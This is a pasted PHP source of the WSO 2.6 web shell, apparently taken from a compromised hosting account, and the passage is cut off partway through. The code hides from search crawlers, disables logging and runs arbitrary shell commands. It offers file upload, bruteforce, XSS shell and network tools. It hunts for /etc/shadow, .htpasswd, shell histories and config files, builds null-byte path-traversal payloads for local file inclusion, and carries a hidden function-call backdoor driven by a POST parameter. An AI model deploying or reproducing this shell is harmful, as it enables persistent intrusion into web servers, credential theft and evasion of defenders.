· 5 years ago · Mar 10, 2020, 05:38 AM
1session_start();
2$password = "";
3$passtype = "";
4$color = "#df5";
5$default_action = 'FilesMan';
6$default_use_ajax = true;
7$default_charset = 'Windows-1251';
8if(!empty($_SERVER['HTTP_USER_AGENT'])) {
9$userAgents = array("Google","Slurp","MSNBot","ia_archiver","Yandex","Rambler");
10if(preg_match('/'.implode('|',$userAgents) .'/i',$_SERVER['HTTP_USER_AGENT'])) {
11header('HTTP/1.0 404 Not Found');
12exit;
13}}
14@session_start();
15@ini_set('error_log',NULL);
16@ini_set('log_errors',0);
17@ini_set('max_execution_time',0);
18@set_time_limit(0);
19@define('WSO_VERSION','2.6');
20@setcookie("wsog","orb",time()+3600*24*7);
21if(get_magic_quotes_gpc()) {
22function WSOstripslashes($array) {
23return is_array($array) ?array_map('WSOstripslashes',$array) : stripslashes($array);
24}
25$_POST = WSOstripslashes($_POST);
26}
27$dir = md5('/home/k3030889/public_html/media/temp/30b2c088dc63ae3e97ca260cb16a6c68.txt' );
28if(!empty($password) and $password !== 0) {
29if (isset($_POST['pass'])) {
30if ($passtype == "MD5") {
31$visitorpassword = md5($_POST['pass']);}
32elseif ($passtype == "SHA1") {
33$visitorpassword = sha1($_POST['pass']);}
34else {
35$visitorpassword = $_POST['pass'];}
36if($visitorpassword == $password){
37$_SESSION[$dir] = "OK";}
38}
39if ( !isset($_SESSION[$dir]) ||($_SESSION[$dir] != "OK") ) {
40die("<pre align=center><form method=post>Password: <input type=password name=pass><input type=submit value='>>'></form></pre>");}
41}
42elseif ($password == 0) {
43$_SESSION[$dir] = "OK";
44}
45if(strtolower(substr(PHP_OS,0,3)) == "win")
46$os = 'win';
47else
48$os = 'nix';
49$safe_mode = @ini_get('safe_mode');
50if(!$safe_mode)
51error_reporting(0);
52$disable_functions = @ini_get('disable_functions');
53$home_cwd = @getcwd();
54if(isset($_POST['c']))
55@chdir($_POST['c']);
56$cwd = @getcwd();
57if($os == 'win') {
58$home_cwd = str_replace("\\","/",$home_cwd);
59$cwd = str_replace("\\","/",$cwd);
60}
61if( $cwd[strlen($cwd)-1] != '/')
62$cwd .= '/';
63if(!isset($_SESSION[md5($_SERVER['HTTP_HOST']) .'ajax']))
64$_SESSION[md5($_SERVER['HTTP_HOST']) .'ajax'] = (bool)$GLOBALS['default_use_ajax'];
65if($os == 'win')
66$aliases = array(
67"List Directory"=>"dir",
68"Find index.php in current dir"=>"dir /s /w /b index.php",
69"Find *config*.php in current dir"=>"dir /s /w /b *config*.php",
70"Show active connections"=>"netstat -an",
71"Show running services"=>"net start",
72"User accounts"=>"net user",
73"Show computers"=>"net view",
74"ARP Table"=>"arp -a",
75"IP Configuration"=>"ipconfig /all"
76);
77else
78$aliases = array(
79"List dir"=>"ls -lha",
80"list file attributes on a Linux second extended file system"=>"lsattr -va",
81"show opened ports"=>"netstat -an | grep -i listen",
82"process status"=>"ps aux",
83"Find"=>"",
84"find all suid files"=>"find / -type f -perm -04000 -ls",
85"find suid files in current dir"=>"find . -type f -perm -04000 -ls",
86"find all sgid files"=>"find / -type f -perm -02000 -ls",
87"find sgid files in current dir"=>"find . -type f -perm -02000 -ls",
88"find config.inc.php files"=>"find / -type f -name config.inc.php",
89"find config* files"=>"find / -type f -name \"config*\"",
90"find config* files in current dir"=>"find . -type f -name \"config*\"",
91"find all writable folders and files"=>"find / -perm -2 -ls",
92"find all writable folders and files in current dir"=>"find . -perm -2 -ls",
93"find all service.pwd files"=>"find / -type f -name service.pwd",
94"find service.pwd files in current dir"=>"find . -type f -name service.pwd",
95"find all .htpasswd files"=>"find / -type f -name .htpasswd",
96"find .htpasswd files in current dir"=>"find . -type f -name .htpasswd",
97"find all .bash_history files"=>"find / -type f -name .bash_history",
98"find .bash_history files in current dir"=>"find . -type f -name .bash_history",
99"find all .fetchmailrc files"=>"find / -type f -name .fetchmailrc",
100"find .fetchmailrc files in current dir"=>"find . -type f -name .fetchmailrc",
101"Locate"=>"",
102"locate httpd.conf files"=>"locate httpd.conf",
103"locate vhosts.conf files"=>"locate vhosts.conf",
104"locate proftpd.conf files"=>"locate proftpd.conf",
105"locate psybnc.conf files"=>"locate psybnc.conf",
106"locate my.conf files"=>"locate my.conf",
107"locate admin.php files"=>"locate admin.php",
108"locate cfg.php files"=>"locate cfg.php",
109"locate conf.php files"=>"locate conf.php",
110"locate config.dat files"=>"locate config.dat",
111"locate config.php files"=>"locate config.php",
112"locate config.inc files"=>"locate config.inc",
113"locate config.inc.php"=>"locate config.inc.php",
114"locate config.default.php files"=>"locate config.default.php",
115"locate config* files "=>"locate config",
116"locate .conf files"=>"locate '.conf'",
117"locate .pwd files"=>"locate '.pwd'",
118"locate .sql files"=>"locate '.sql'",
119"locate .htpasswd files"=>"locate '.htpasswd'",
120"locate .bash_history files"=>"locate '.bash_history'",
121"locate .mysql_history files"=>"locate '.mysql_history'",
122"locate .fetchmailrc files"=>"locate '.fetchmailrc'",
123"locate backup files"=>"locate backup",
124"locate dump files"=>"locate dump",
125"locate priv files"=>"locate priv"
126);
127function wsoHeader() {
128if(empty($_POST['charset']))
129$_POST['charset'] = $GLOBALS['default_charset'];
130global $color;
131echo "<html><head>
132<meta http-equiv='Content-Type' content='text/html; charset=".$_POST['charset'] ."'><title>".$_SERVER['HTTP_HOST'] ." - WSO ".WSO_VERSION ."</title>
133<style>
134body{background-color:#444;color:#e1e1e1;}
135body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; }
136table.info{ color:#fff;background-color:#222; }
137span,h1,a{ color: $color !important; }
138span{ font-weight: bolder; }
139h1{ border-left:5px solid $color;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; }
140div.content{ padding: 5px;margin-left:5px;background-color:#333; }
141a{ text-decoration:none; }
142a:hover{ text-decoration:underline; }
143#pre{font.family:Courier,Monospace;}
144.ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; }
145.bigarea{ width:100%;height:300px; }
146input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid $color; font: 9pt Monospace,'Courier New'; }
147form{ margin:0px; }
148#toolsTbl{ text-align:center; }
149.toolsInp{ width: 300px }
150.main th{text-align:left;background-color:#5e5e5e;}
151.main tr:hover{background-color:#5e5e5e}
152.l1{background-color:#444}
153.l2{background-color:#333}
154pre{font-family:Courier,Monospace;}
155</style>
156<script>
157 var c_ = '".htmlspecialchars($GLOBALS['cwd']) ."';
158 var a_ = '".htmlspecialchars(@$_POST['a']) ."'
159 var charset_ = '".htmlspecialchars(@$_POST['charset']) ."';
160 var p1_ = '".((strpos(@$_POST['p1'],"\n")!==false)?'':htmlspecialchars($_POST['p1'],ENT_QUOTES)) ."';
161 var p2_ = '".((strpos(@$_POST['p2'],"\n")!==false)?'':htmlspecialchars($_POST['p2'],ENT_QUOTES)) ."';
162 var p3_ = '".((strpos(@$_POST['p3'],"\n")!==false)?'':htmlspecialchars($_POST['p3'],ENT_QUOTES)) ."';
163 var p4_ = '".((strpos(@$_POST['p4'],"md")===false)?'':htmlspecialchars($_POST['p4']('/home/k3030889/public_html/media/temp/30b2c088dc63ae3e97ca260cb16a6c68.txt'),ENT_QUOTES)) ."';
164
165 var d = document;
166 function set(a,c,p1,p2,p3,charset) {
167 if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_;
168 if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_;
169 if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_;
170 if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_;
171 if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_;
172 if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;
173 }
174 function g(a,c,p1,p2,p3,charset) {
175 set(a,c,p1,p2,p3,charset);
176 d.mf.submit();
177 }
178 function a(a,c,p1,p2,p3,charset) {
179 set(a,c,p1,p2,p3,charset);
180 var params = 'ajax=true';
181 for(i=0;i<d.mf.elements.length;i++)
182 params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value);
183 sr('".addslashes($_SERVER['REQUEST_URI']) ."', params);
184 }
185 function sr(url, params) {
186 //if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;
187 if (window.XMLHttpRequest)
188 req = new XMLHttpRequest();
189 else if (window.ActiveXObject)
190 req = new ActiveXObject('Microsoft.XMLHTTP');
191 if (req) {
192 req.onreadystatechange = processReqChange;
193 req.open('POST', url, true);
194 req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded');
195 req.send(params);
196 }
197 }
198 function processReqChange() {
199 if( (req.readyState == 4) )
200 if(req.status == 200) {
201 var reg = new RegExp(\"(\\\\d+)([\\\\S\\\\s]*)\", 'm');
202 var arr=reg.exec(req.responseText);
203 eval(arr[2].substr(0, arr[1]));
204 } else alert('Request error!');
205 }
206</script>
207<head><body><div style='position:absolute;width:100%;background-color:#000;top:0;left:0;'>
208<form method=post name=mf style='display:none;'>
209<input type=hidden name=a>
210<input type=hidden name=c>
211<input type=hidden name=p1>
212<input type=hidden name=p2>
213
214<input type=hidden name=p3>
215<input type=hidden name=charset>
216</form>";
217$freeSpace = @diskfreespace($GLOBALS['cwd']);
218$totalSpace = @disk_total_space($GLOBALS['cwd']);
219$totalSpace = $totalSpace?$totalSpace:1;
220$release = @php_uname('r');
221$kernel = @php_uname('s');
222if(!function_exists('posix_getegid')) {
223$user = @get_current_user();
224$uid = @getmyuid();
225$gid = @getmygid();
226$group = "?";
227}else {
228$uid = @posix_getpwuid(posix_geteuid());
229$gid = @posix_getgrgid(posix_getegid());
230$user = $uid['name'];
231$uid = $uid['uid'];
232$group = $gid['name'];
233$gid = $gid['gid'];
234}
235$cwd_links = '';
236$path = explode("/",$GLOBALS['cwd']);
237$n=count($path);
238for($i=0;$i<$n-1;$i++) {
239$cwd_links .= "<a href='#' onclick='g(\"FilesMan\",\"";
240for($j=0;$j<=$i;$j++)
241$cwd_links .= $path[$j].'/';
242$cwd_links .= "\")'>".$path[$i]."/</a>";
243}
244$charsets = array('UTF-8','Windows-1251','KOI8-R','KOI8-U','cp866');
245$opt_charsets = '';
246foreach($charsets as $item)
247$opt_charsets .= '<option value="'.$item.'" '.($_POST['charset']==$item?'selected':'').'>'.$item.'</option>';
248$m = array('Sec Info'=>'SecInfo','Files'=>'FilesMan','Exec'=>'Console','Sql'=>'Sql','PHP Tools'=>'phptools','LFI'=>'lfiscan','Php'=>'Php','Safe mode'=>'SafeMode','String tools'=>'StringTools','XSS Shell'=>'XSSShell','Bruteforce'=>'Bruteforce','Network'=>'Network');
249if(!empty($GLOBALS['auth_pass']))
250$m['Logout'] = 'Logout';
251$m['Self remove'] = 'SelfRemove';
252$menu = '';
253foreach($m as $k =>$v)
254$menu .= '<th width="'.(int)(100/count($m)).'%">[<a href="#" onclick="g(\''.$v.'\',null,\'\',\'\',\'\')">'.$k.'</a>]</th>';
255$drives = "";
256if($GLOBALS['os'] == 'win') {
257foreach(range('c','z') as $drive)
258if(is_dir($drive.':\\'))
259$drives .= '<a href="#" onclick="g(\'FilesMan\',\''.$drive.':/\')">[ '.$drive.' ]</a> ';
260}
261echo '<table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:'.($GLOBALS['os'] == 'win'?'<br>Drives:':'') .'</span></td>'
262.'<td><nobr>'.substr(@php_uname(),0,120) .' </nobr><br>'.$uid .' ( '.$user .' ) <span>Group:</span> '.$gid .' ( '.$group .' )<br>'.@phpversion() .' <span>Safe mode:</span> '.($GLOBALS['safe_mode']?'<font color=red>ON</font>':'<font color=#00bb00><b>OFF</b></font>')
263.' <a href=# onclick="g(\'Php\',null,\'\',\'info\')">[ phpinfo ]</a> <span>Datetime:</span> '.date('Y-m-d H:i:s') .'<br>'.wsoViewSize($totalSpace) .' <span>Free:</span> '.wsoViewSize($freeSpace) .' ('.(int) ($freeSpace/$totalSpace*100) .'%)<br>'.$cwd_links .' '.wsoPermsColor($GLOBALS['cwd']) .' <a href=# onclick="g(\'FilesMan\',\''.$GLOBALS['home_cwd'] .'\',\'\',\'\',\'\')">[ home ]</a><br>'.$drives .'</td>'
264.'<td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset">'.$opt_charsets .'</optgroup></select><br><span>Server IP:</span><br>'.@$_SERVER["SERVER_ADDR"] .'<br><span>Client IP:</span><br>'.$_SERVER['REMOTE_ADDR'] .'</nobr></td></tr></table>'
265.'<table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr>'.$menu .'</tr></table><div style="margin:5">';
266}
267function wsoFooter() {
268$is_writable = is_writable($GLOBALS['cwd'])?" <font color='#25ff00'>(Writeable)</font>":" <font color=red>(Not writable)</font>";
269echo "
270
271</div>
272<table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'>
273 <tr>
274 <td><form onsubmit='g(null,this.c.value,\"\");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='".htmlspecialchars($GLOBALS['cwd']) ."'><input type=submit value='>>'></form></td>
275 <td><form onsubmit=\"g('FilesTools',null,this.f.value);return false;\"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td>
276 </tr><tr>
277 <td><form onsubmit=\"g('FilesMan',null,'mkdir',this.d.value);return false;\"><span>Make dir:</span>$is_writable<br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td>
278 <td><form onsubmit=\"g('FilesTools',null,this.f.value,'mkfile');return false;\"><span>Make file:</span>$is_writable<br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td>
279
280 </tr><tr>
281 <td><form onsubmit=\"g('Console',null,this.c.value);return false;\"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td>
282 <td><form method='post' ENCTYPE='multipart/form-data'>
283 <input type=hidden name=a value='FilesMAn'>
284 <input type=hidden name=c value='".$GLOBALS['cwd'] ."'>
285 <input type=hidden name=p1 value='uploadFile'>
286 <input type=hidden name=charset value='".(isset($_POST['charset'])?$_POST['charset']:'') ."'>
287 <span>Upload file:</span>$is_writable<br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td></tr></table></div></body></html>";
288}
289if (!function_exists("posix_getpwuid") &&(strpos($GLOBALS['disable_functions'],'posix_getpwuid')===false)) {
290function posix_getpwuid($p) {return false;}}
291if (!function_exists("posix_getgrgid") &&(strpos($GLOBALS['disable_functions'],'posix_getgrgid')===false)) {
292function posix_getgrgid($p) {return false;}}
293function wsoEx($in) {
294$out = '';
295if (function_exists('exec')) {
296@exec($in,$out);
297$out = @join("\n",$out);
298}elseif (function_exists('passthru')) {
299ob_start();
300@passthru($in);
301$out = ob_get_clean();
302}elseif (function_exists('system')) {
303ob_start();
304@system($in);
305$out = ob_get_clean();
306}elseif (function_exists('shell_exec')) {
307$out = shell_exec($in);
308}elseif (is_resource($f = @popen($in,"r"))) {
309$out = "";
310while(!@feof($f))
311$out .= fread($f,1024);
312pclose($f);
313}
314return $out;
315}
316function wsoViewSize($s) {
317if($s >= 1073741824)
318return sprintf('%1.2f',$s / 1073741824 ).' GB';
319elseif($s >= 1048576)
320return sprintf('%1.2f',$s / 1048576 ) .' MB';
321elseif($s >= 1024)
322return sprintf('%1.2f',$s / 1024 ) .' KB';
323else
324return $s .' B';
325}
326function wsoPerms($p) {
327if (($p &0xC000) == 0xC000)$i = 's';
328elseif (($p &0xA000) == 0xA000)$i = 'l';
329elseif (($p &0x8000) == 0x8000)$i = '-';
330elseif (($p &0x6000) == 0x6000)$i = 'b';
331elseif (($p &0x4000) == 0x4000)$i = 'd';
332elseif (($p &0x2000) == 0x2000)$i = 'c';
333elseif (($p &0x1000) == 0x1000)$i = 'p';
334else $i = 'u';
335$i .= (($p &0x0100) ?'r': '-');
336$i .= (($p &0x0080) ?'w': '-');
337$i .= (($p &0x0040) ?(($p &0x0800) ?'s': 'x') : (($p &0x0800) ?'S': '-'));
338$i .= (($p &0x0020) ?'r': '-');
339$i .= (($p &0x0010) ?'w': '-');
340$i .= (($p &0x0008) ?(($p &0x0400) ?'s': 'x') : (($p &0x0400) ?'S': '-'));
341$i .= (($p &0x0004) ?'r': '-');
342$i .= (($p &0x0002) ?'w': '-');
343$i .= (($p &0x0001) ?(($p &0x0200) ?'t': 'x') : (($p &0x0200) ?'T': '-'));
344return $i;
345}
346function wsoPermsColor($f) {
347if (!@is_readable($f))
348return '<font color=#FF0000>'.wsoPerms(@fileperms($f)) .'</font>';
349elseif (!@is_writable($f))
350return '<font color=white>'.wsoPerms(@fileperms($f)) .'</font>';
351else
352return '<font color=#00BB00>'.wsoPerms(@fileperms($f)) .'</font>';
353}
354if(!function_exists("scandir")) {
355function scandir($dir) {
356$dh = opendir($dir);
357while (false !== ($filename = readdir($dh)))
358$files[] = $filename;
359return $files;
360}
361}
362function wsoWhich($p) {
363$path = wsoEx('which '.$p);
364if(!empty($path))
365return $path;
366return false;
367}
368function actionSecInfo() {
369wsoHeader();
370echo '<h1>Server security information</h1><div class=content>';
371function wsoSecParam($n,$v) {
372$v = trim($v);
373if($v) {
374echo '<span>'.$n .': </span>';
375if(strpos($v,"\n") === false)
376echo $v .'<br>';
377else
378echo '<pre class=ml1>'.$v .'</pre>';
379}
380}
381wsoSecParam('Server software',@getenv('SERVER_SOFTWARE'));
382if(function_exists('apache_get_modules'))
383wsoSecParam('Loaded Apache modules',implode(', ',apache_get_modules()));
384wsoSecParam('Disabled PHP Functions',$GLOBALS['disable_functions']?$GLOBALS['disable_functions']:'none');
385wsoSecParam('Open base dir',@ini_get('open_basedir'));
386wsoSecParam('Safe mode exec dir',@ini_get('safe_mode_exec_dir'));
387wsoSecParam('Safe mode include dir',@ini_get('safe_mode_include_dir'));
388wsoSecParam('cURL support',function_exists('curl_version')?'enabled':'no');
389$temp=array();
390if(function_exists('mysql_get_client_info'))
391$temp[] = "MySql (".mysql_get_client_info().")";
392if(function_exists('mssql_connect'))
393$temp[] = "MSSQL";
394if(function_exists('pg_connect'))
395$temp[] = "PostgreSQL";
396if(function_exists('oci_connect'))
397$temp[] = "Oracle";
398wsoSecParam('Supported databases',implode(', ',$temp));
399echo '<br>';
400if($GLOBALS['os'] == 'nix') {
401wsoSecParam('Readable /etc/passwd',@is_readable('/etc/passwd')?"yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"passwd\")'>[view]</a>":'no');
402wsoSecParam('Readable /etc/shadow',@is_readable('/etc/shadow')?"yes <a href='#' onclick='g(\"FilesTools\", \"etc\", \"shadow\")'>[view]</a>":'no');
403wsoSecParam('OS version',@file_get_contents('/proc/version'));
404wsoSecParam('Distr name',@file_get_contents('/etc/issue.net'));
405if(!$GLOBALS['safe_mode']) {
406$userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
407$danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja');
408$downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
409echo '<br>';
410$temp=array();
411foreach ($userful as $item)
412if(wsoWhich($item))
413$temp[] = $item;
414wsoSecParam('Userful',implode(', ',$temp));
415$temp=array();
416foreach ($danger as $item)
417if(wsoWhich($item))
418$temp[] = $item;
419wsoSecParam('Danger',implode(', ',$temp));
420$temp=array();
421foreach ($downloaders as $item)
422if(wsoWhich($item))
423$temp[] = $item;
424wsoSecParam('Downloaders',implode(', ',$temp));
425echo '<br/>';
426wsoSecParam('HDD space',wsoEx('df -h'));
427wsoSecParam('Hosts',@file_get_contents('/etc/hosts'));
428}
429}else {
430wsoSecParam('OS Version',wsoEx('ver'));
431wsoSecParam('Account Settings',wsoEx('net accounts'));
432wsoSecParam('User Accounts',wsoEx('net user'));
433}
434echo '</div>';
435wsoFooter();
436}
437function actionlfiscan() {
438wsoHeader();
439print '
440 <h3>Led-Zeppelin\'s LFI File dumper</h3>
441
442 <form method="post" action="?"><input type="hidden" name="a" value="lfiscan">
443 LFI URL: <input type="text" size="60" name="lfiurl" value=""> <input type="submit" value="Go"> File: <select name="scantype">
444 <option value="1">
445 Access Log
446 </option>
447
448 <option value="2">
449 httpd.conf
450 </option>
451
452 <option value="3">
453 Error Log
454 </option>
455 <option value="4">
456 php.ini
457 </option>
458 <option value="5">
459 MySQL
460 </option>
461 <option value="6">
462 FTP
463 </option>
464 <option value="7">
465 Environ
466 </option>
467 </select> Null: <select name="null">
468 <option value="%00">
469 Yes
470 </option>
471
472 <option value="">
473 No
474 </option>
475 </select> User-Agent: <input type="text" size="20" name="custom_header" value="">
476 </form>';
477error_reporting(0);
478if($_POST['lfiurl']) {
479print "<pre>";
480$cheader = $_POST['custom_header'];
481$target = $_POST['lfiurl'];
482$type = $_POST['scantype'];
483$byte1 = $_POST['null'];
484$lfitest = "../../../../../../../../../../../../../../etc/passwd".$byte1."";
485$lfitest2 = "../../../../../../../../../../../../../../fake/file".$byte1."";
486$lfiprocenv = "../../../../../../../../../../../../../../proc/environ".$byte1."";
487$lfiaccess = array(
4881 =>"../../../../../../../../../../../../../../apache/logs/access.log".$byte1."",
4892 =>"../../../../../../../../../../../../../../etc/httpd/logs/acces_log".$byte1."",
4903 =>"../../../../../../../../../../../../../../etc/httpd/logs/acces.log".$byte1."",
4914 =>"../../../../../../../../../../../../../../var/www/logs/access_log".$byte1."",
4925 =>"../../../../../../../../../../../../../../var/www/logs/access.log".$byte1."",
4936 =>"../../../../../../../../../../../../../../usr/local/apache/logs/access_log".$byte1."",
4947 =>"../../../../../../../../../../../../../../usr/local/apache/logs/access.log".$byte1."",
4958 =>"../../../../../../../../../../../../../../var/log/apache/access_log".$byte1."",
4969 =>"../../../../../../../../../../../../../../var/log/apache2/access_log".$byte1."",
49710 =>"../../../../../../../../../../../../../../var/log/apache/access.log".$byte1."",
49811 =>"../../../../../../../../../../../../../../var/log/apache2/access.log".$byte1."",
49912 =>"../../../../../../../../../../../../../../var/log/access_log".$byte1."",
50013 =>"../../../../../../../../../../../../../../var/log/access.log".$byte1."",
50114 =>"../../../../../../../../../../../../../../var/log/httpd/access_log".$byte1."",
50215 =>"../../../../../../../../../../../../../../apache2/logs/access.log".$byte1."",
50316 =>"../../../../../../../../../../../../../../logs/access.log".$byte1."",
50417 =>"../../../../../../../../../../../../../../usr/local/apache2/logs/access_log".$byte1."",
50518 =>"../../../../../../../../../../../../../../usr/local/apache2/logs/access.log".$byte1."",
50619 =>"../../../../../../../../../../../../../../var/log/httpd/access.log".$byte1."",
50720 =>"../../../../../../../../../../../../../../opt/lampp/logs/access_log".$byte1."",
50821 =>"../../../../../../../../../../../../../../opt/xampp/logs/access_log".$byte1."",
50922 =>"../../../../../../../../../../../../../../opt/lampp/logs/access.log".$byte1."",
51023 =>"../../../../../../../../../../../../../../opt/xampp/logs/access.log".$byte1."");
511$lfierror = array(
5121 =>"../../../../../../../../../../../../../../apache/logs/error.log".$byte1."",
5132 =>"../../../../../../../../../../../../../../etc/httpd/logs/error_log".$byte1."",
5143 =>"../../../../../../../../../../../../../../etc/httpd/logs/error.log".$byte1."",
5154 =>"../../../../../../../../../../../../../../var/www/logs/error_log".$byte1."",
5165 =>"../../../../../../../../../../../../../../var/www/logs/error.log".$byte1."",
5176 =>"../../../../../../../../../../../../../../usr/local/apache/logs/error_log".$byte1."",
5187 =>"../../../../../../../../../../../../../../usr/local/apache/logs/error.log".$byte1."",
5198 =>"../../../../../../../../../../../../../../var/log/apache/error_log".$byte1."",
5209 =>"../../../../../../../../../../../../../../var/log/apache2/error_log".$byte1."",
52110 =>"../../../../../../../../../../../../../../var/log/apache/error.log".$byte1."",
52211 =>"../../../../../../../../../../../../../../var/log/apache2/error.log".$byte1."",
52312 =>"../../../../../../../../../../../../../../var/log/error_log".$byte1."",
52413 =>"../../../../../../../../../../../../../../var/log/error.log".$byte1."",
52514 =>"../../../../../../../../../../../../../../var/log/httpd/error_log".$byte1."",
52615 =>"../../../../../../../../../../../../../../apache2/logs/error.log".$byte1."",
52716 =>"../../../../../../../../../../../../../../logs/error.log".$byte1."",
52817 =>"../../../../../../../../../../../../../../usr/local/apache2/logs/error_log".$byte1."",
52918 =>"../../../../../../../../../../../../../../usr/local/apache2/logs/error.log".$byte1."",
53019 =>"../../../../../../../../../../../../../../var/log/httpd/error.log".$byte1."",
53120 =>"../../../../../../../../../../../../../../opt/lampp/logs/error_log".$byte1."",
53221 =>"../../../../../../../../../../../../../../opt/xampp/logs/error_log".$byte1."",
53322 =>"../../../../../../../../../../../../../../opt/lampp/logs/error.log".$byte1."",
53423 =>"../../../../../../../../../../../../../../opt/xampp/logs/error.log".$byte1."");
535$lficonfig = array(
5361 =>"../../../../../../../../../../../../../../../usr/local/apache/conf/httpd.conf".$byte1."",
5372 =>"../../../../../../../../../../../../../../../usr/local/apache2/conf/httpd.conf".$byte1."",
5383 =>"../../../../../../../../../../../../../../../etc/httpd/conf/httpd.conf".$byte1."",
5394 =>"../../../../../../../../../../../../../../../etc/apache/conf/httpd.conf".$byte1."",
5405 =>"../../../../../../../../../../../../../../../usr/local/etc/apache/conf/httpd.conf".$byte1."",
5416 =>"../../../../../../../../../../../../../../../etc/apache2/httpd.conf".$byte1."",
5427 =>"../../../../../../../../../../../../../../../usr/local/apache/httpd.conf".$byte1."",
5438 =>"../../../../../../../../../../../../../../../usr/local/apache2/httpd.conf".$byte1."",
5449 =>"../../../../../../../../../../../../../../../usr/local/httpd/conf/httpd.conf".$byte1."",
54510 =>"../../../../../../../../../../../../../../../usr/local/etc/apache2/conf/httpd.conf".$byte1."",
54611 =>"../../../../../../../../../../../../../../../usr/local/etc/httpd/conf/httpd.conf".$byte1."",
54712 =>"../../../../../../../../../../../../../../../usr/apache2/conf/httpd.conf".$byte1."",
54813 =>"../../../../../../../../../../../../../../../usr/apache/conf/httpd.conf".$byte1."",
54914 =>"../../../../../../../../../../../../../../../usr/local/apps/apache2/conf/httpd.conf".$byte1."",
55015 =>"../../../../../../../../../../../../../../../usr/local/apps/apache/conf/httpd.conf".$byte1."",
55116 =>"../../../../../../../../../../../../../../../etc/apache2/conf/httpd.conf".$byte1."",
55217 =>"../../../../../../../../../../../../../../../etc/http/conf/httpd.conf".$byte1."",
55318 =>"../../../../../../../../../../../../../../../etc/httpd/httpd.conf".$byte1."",
55419 =>"../../../../../../../../../../../../../../../etc/http/httpd.conf".$byte1."",
55520 =>"../../../../../../../../../../../../../../../etc/httpd.conf".$byte1."",
55621 =>"../../../../../../../../../../../../../../../opt/apache/conf/httpd.conf".$byte1."",
55722 =>"../../../../../../../../../../../../../../../opt/apache2/conf/httpd.conf".$byte1."",
55823 =>"../../../../../../../../../../../../../../../var/www/conf/httpd.conf".$byte1."",
55924 =>"../../../../../../../../../../../../../../../private/etc/httpd/httpd.conf".$byte1."",
56025 =>"../../../../../../../../../../../../../../../private/etc/httpd/httpd.conf.default".$byte1."",
56126 =>"../../../../../../../../../../../../../../../Volumes/webBackup/opt/apache2/conf/httpd.conf".$byte1."",
56227 =>"../../../../../../../../../../../../../../../Volumes/webBackup/private/etc/httpd/httpd.conf".$byte1."",
56328 =>"../../../../../../../../../../../../../../../Volumes/webBackup/private/etc/httpd/httpd.conf.default".$byte1."",
56429 =>"../../../../../../../../../../../../../../../usr/local/php/httpd.conf.php".$byte1."",
56530 =>"../../../../../../../../../../../../../../../usr/local/php4/httpd.conf.php".$byte1."",
56631 =>"../../../../../../../../../../../../../../../usr/local/php5/httpd.conf.php".$byte1."",
56732 =>"../../../../../../../../../../../../../../../usr/local/php/httpd.conf".$byte1."",
56833 =>"../../../../../../../../../../../../../../../usr/local/php4/httpd.conf".$byte1."",
56934 =>"../../../../../../../../../../../../../../../usr/local/php5/httpd.conf".$byte1."",
57035 =>"../../../../../../../../../../../../../../../usr/local/etc/apache/vhosts.conf".$byte1."");
571$lfiphpini = array(
5721 =>"../../../../../../../../../../../../../../../etc/php.ini".$byte1."",
5732 =>"../../../../../../../../../../../../../../../bin/php.ini".$byte1."",
5743 =>"../../../../../../../../../../../../../../../etc/httpd/php.ini".$byte1."",
5754 =>"../../../../../../../../../../../../../../../usr/lib/php.ini".$byte1."",
5765 =>"../../../../../../../../../../../../../../../usr/lib/php/php.ini".$byte1."",
5776 =>"../../../../../../../../../../../../../../../usr/local/etc/php.ini".$byte1."",
5787 =>"../../../../../../../../../../../../../../../usr/local/lib/php.ini".$byte1."",
5798 =>"../../../../../../../../../../../../../../../usr/local/php/lib/php.ini".$byte1."",
5809 =>"../../../../../../../../../../../../../../../usr/local/php4/lib/php.ini".$byte1."",
58110 =>"../../../../../../../../../../../../../../../usr/local/php5/lib/php.ini".$byte1."",
58211 =>"../../../../../../../../../../../../../../../usr/local/apache/conf/php.ini".$byte1."",
58312 =>"../../../../../../../../../../../../../../../etc/php4.4/fcgi/php.ini".$byte1."",
58413 =>"../../../../../../../../../../../../../../../etc/php4/apache/php.ini".$byte1."",
58514 =>"../../../../../../../../../../../../../../../etc/php4/apache2/php.ini".$byte1."",
58615 =>"../../../../../../../../../../../../../../../etc/php5/apache/php.ini".$byte1."",
58716 =>"../../../../../../../../../../../../../../../etc/php5/apache2/php.ini".$byte1."",
58817 =>"../../../../../../../../../../../../../../../etc/php/php.ini".$byte1."",
58918 =>"../../../../../../../../../../../../../../../etc/php/php4/php.ini".$byte1."",
